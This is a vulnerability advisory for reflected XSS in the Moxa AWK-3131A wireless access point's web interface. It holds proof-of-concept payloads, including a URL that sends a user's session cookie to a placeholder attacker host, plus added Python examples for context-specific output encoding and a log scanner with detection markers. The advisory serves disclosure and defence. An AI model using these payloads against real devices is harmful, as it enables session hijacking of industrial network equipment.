An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause malicious script to be executed in a victim's browser.
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
http://www.moxa.com/product/AWK-3131A.htm
7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
An exploitable Reflected Cross-Site Scripting (XSS) vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. Specially crafted input, in multiple parameters, can cause malicious script to be executed in a victim's browser.
The following parameters have been validated as being vulnerable to XSS exploitation:
- devIndex parameter in clientlist.asp
- devIndex parameter in multiplessidset.asp
- index parameter in wirelesscert.asp
- vapIndex parameter in wireless_security.asp
In testing, it was possible to inject JavaScript that sent a legitimate user's session token to an attacker-controlled host, allowing the attacker to impersonate that authenticated user.
Basic PoC
In multiplessidset.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f. The leading "; terminates the quoted value the parameter is reflected into, and %2f%2f decodes to //, which comments out the remainder of the original line so the injected script runs without a syntax error:
";alert(1)%2f%2f
Stealing Session Tokens
The URL below will send an authenticated user's valid session token to the attacker (<device IP> and <attacker IP> are placeholders for the target device and the attacker's collection host):
http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E
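The two published payloads imply two different reflection contexts: ";alert(1)// is shaped to escape a JavaScript string literal, while "><script>...</script> is shaped to close an HTML attribute. The following is an added example, not code from the advisory or from Moxa: it models both contexts with hypothetical page templates (the real firmware templates, the initClients() call and the attacker.invalid host are assumptions), feeds the advisory's own payloads through a verbatim-reflecting template and through a template that encodes for the exact context, and applies the checks a tester would run on the rendered response to confirm whether the break-out happened.

```python
"""Added example, not code from the advisory or from Moxa.

Models the two reflection contexts implied by the published payloads:
  1. devIndex reflected into a JavaScript string literal (payload ";alert(1)//)
  2. index reflected into a double-quoted HTML attribute (payload "><script>...)
and shows the context-specific output encoding that neutralises each.
The templates, the initClients() call and the attacker host are assumptions
made for illustration; the device's real page templates are not known here.
"""
import html
import json
import re
from urllib.parse import unquote

# Payloads as published in the advisory (query-string form); attacker host is a placeholder.
JS_STRING_PAYLOAD = '";alert(1)%2f%2f'
ATTR_PAYLOAD = ('%22%3E%3Cscript%3Ewindow.location=%22http://attacker.invalid/test'
                '?cookie=%22.concat%28document.cookie%29%3C/script%3E')

# ---- hypothetical vulnerable templates: the parameter is copied in verbatim ----
JS_TEMPLATE = '<script>var devIndex = "%s"; initClients(devIndex);</script>'
ATTR_TEMPLATE = '<input type="hidden" name="index" value="%s">'


def render_js_vulnerable(dev_index: str) -> str:
    return JS_TEMPLATE % dev_index


def render_attr_vulnerable(index: str) -> str:
    return ATTR_TEMPLATE % index


# ---- hardened templates: encode for the exact context the value lands in ----
def js_string_literal(value: str) -> str:
    # json.dumps escapes '"', '\' and control characters; '/' is escaped by hand so a
    # value containing "</script>" cannot terminate the enclosing <script> block.
    return json.dumps(value).replace('/', '\\/')


def render_js_hardened(dev_index: str) -> str:
    # The literal already carries its own quotes, so the template omits them.
    return '<script>var devIndex = %s; initClients(devIndex);</script>' % js_string_literal(dev_index)


def render_attr_hardened(index: str) -> str:
    # quote=True also encodes '"' and "'" so the value cannot close the attribute.
    return ATTR_TEMPLATE % html.escape(index, quote=True)


# ---- checks a tester runs against the rendered response ----
LITERAL_RE = re.compile(r'var devIndex = "((?:[^"\\]|\\.)*)"')   # a JS double-quoted literal
SCRIPT_OPEN_RE = re.compile(r'<script\b', re.I)
JS_TEMPLATE_TAIL = '; initClients(devIndex);</script>'


def js_string_breakout(page: str) -> bool:
    """True if anything other than the template's own code follows the devIndex literal,
    i.e. the reflected value terminated the string and the attacker controls what runs next."""
    m = LITERAL_RE.search(page)
    return m is not None and not page[m.end():].startswith(JS_TEMPLATE_TAIL)


def injected_script_tags(page: str, template: str) -> int:
    """Number of <script> openings beyond what the template itself contains."""
    return len(SCRIPT_OPEN_RE.findall(page)) - len(SCRIPT_OPEN_RE.findall(template))


def reflected_verbatim(payload: str, page: str) -> bool:
    """The coarse scanner check: does the decoded payload appear unchanged in the body?"""
    return unquote(payload) in page


def assess() -> dict:
    """Run both payloads through both template variants and report the outcome."""
    dev_index = unquote(JS_STRING_PAYLOAD)
    index = unquote(ATTR_PAYLOAD)
    return {
        'js_vulnerable_breakout': js_string_breakout(render_js_vulnerable(dev_index)),
        'js_hardened_breakout': js_string_breakout(render_js_hardened(dev_index)),
        'attr_vulnerable_injected': injected_script_tags(render_attr_vulnerable(index), ATTR_TEMPLATE % ''),
        'attr_hardened_injected': injected_script_tags(render_attr_hardened(index), ATTR_TEMPLATE % ''),
        'attr_hardened_reflected_raw': reflected_verbatim(ATTR_PAYLOAD, render_attr_hardened(index)),
    }


if __name__ == '__main__':
    for key, value in assess().items():
        print('%-28s %s' % (key, value))
```

The point of the two encoders is that there is no single "escape for XSS": a value reflected inside a JavaScript literal needs JavaScript-string escaping (including the slash, so </script> cannot end the block), while a value reflected inside an attribute needs HTML attribute encoding with quotes covered. Applying only one of them to both locations leaves the other context open, which is consistent with the advisory listing four separate reflection points across four pages.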
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
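Where the web application cannot be disabled, the next best thing is to know when someone tries the published payloads. The following is an added example, not part of the advisory and not Moxa's code: it scans access-log lines for requests to the four pages named above whose index parameter, after undoing percent-encoding (including double encoding), carries script markers instead of a number. The log lines are constructed for this example in combined log format; the device's own log format is not documented in the advisory, and 198.51.100.7 and attacker.invalid are placeholders.

```python
"""Added example, not part of the advisory and not Moxa's code: flags requests that
look like attempts to exploit the reflected XSS in the AWK-3131A web UI, run over
web-server access-log lines.  The sample lines are constructed for this example in
combined log format; the device's real log format is not documented here.
198.51.100.7 and attacker.invalid are placeholders."""
import re
from urllib.parse import unquote

# Pages and parameters listed in the advisory (its PoC URL spells the certificate
# page with an underscore, so both spellings are matched).
VULNERABLE_PARAMS = {
    'clientlist.asp': {'devindex'},
    'multiplessidset.asp': {'devindex'},
    'wirelesscert.asp': {'index'},
    'wireless_cert.asp': {'index'},
    'wireless_security.asp': {'vapindex'},
}
# Substrings a legitimate numeric index never contains; compared after decoding.
MARKERS = ('<script', 'document.cookie', 'window.location', 'javascript:',
           'alert(', 'onerror=', 'onload=')

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (catches %2522 -> %22 -> ")."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def page_of(target: str) -> str:
    # Split by hand: urlsplit() would read the PoC's leading '//' as an authority.
    path = target.partition('?')[0]
    return path.rstrip('/').rsplit('/', 1)[-1].lower()


def analyse_target(target: str) -> list:
    """Return [(param, severity, detail)] for one request target (path?query)."""
    expected = VULNERABLE_PARAMS.get(page_of(target))
    if not expected:
        return []
    query = target.partition('?')[2]
    findings = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if unquote(name).lower() not in expected:
            continue
        decoded = fully_decode(value).lower()
        if decoded.isdigit():
            continue  # an ordinary index value
        hits = [m for m in MARKERS if m in decoded]
        if hits:
            findings.append((name, 'high', 'script markers: ' + ', '.join(hits)))
        else:
            findings.append((name, 'low', 'non-numeric index value'))
    return findings


def scan_log(lines) -> list:
    """Return one dict per log line that carries at least one finding."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_target(m.group('target'))
        if findings:
            results.append({'ip': m.group('ip'), 'ts': m.group('ts'), 'status': m.group('status'),
                            'page': page_of(m.group('target')), 'findings': findings})
    return results


# Constructed sample log: one normal request, the advisory's PoC URL, a double-encoded
# variant of the basic PoC, two more normal requests and a request to an unrelated page.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2017:12:00:01 +0000] "GET /wireless_cert.asp?index=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2017:12:00:05 +0000] "GET //wireless_cert.asp?index=?index=%22%3E%3Cscript%3E'
    'window.location=%22http://attacker.invalid/test?cookie=%22.concat%28document.cookie%29%3C/script%3E'
    ' HTTP/1.1" 200 5312',
    '198.51.100.7 - - [10/Jan/2017:12:00:09 +0000] "GET /multiplessidset.asp?devIndex=%2522%3Balert(1)%252f%252f'
    ' HTTP/1.1" 200 4870',
    '192.0.2.10 - - [10/Jan/2017:12:00:12 +0000] "GET /clientlist.asp?devIndex=0 HTTP/1.1" 200 3300',
    '192.0.2.11 - - [10/Jan/2017:12:00:15 +0000] "GET /wireless_security.asp?vapIndex=abc HTTP/1.1" 200 4100',
    '192.0.2.11 - - [10/Jan/2017:12:00:20 +0000] "GET /index.asp HTTP/1.1" 200 2900',
]

if __name__ == '__main__':
    for r in scan_log(SAMPLE_LOG):
        print(r['ip'], r['page'], r['findings'])
```

The decoder loops rather than calling unquote() once because an attacker who knows the log is inspected can double-encode the payload; the device still decodes it once and reflects a single-encoded value that the browser then renders. Matching on the page name plus the specific parameter keeps the rule narrow enough to be low-noise while still catching variants that use markers other than the two published payloads.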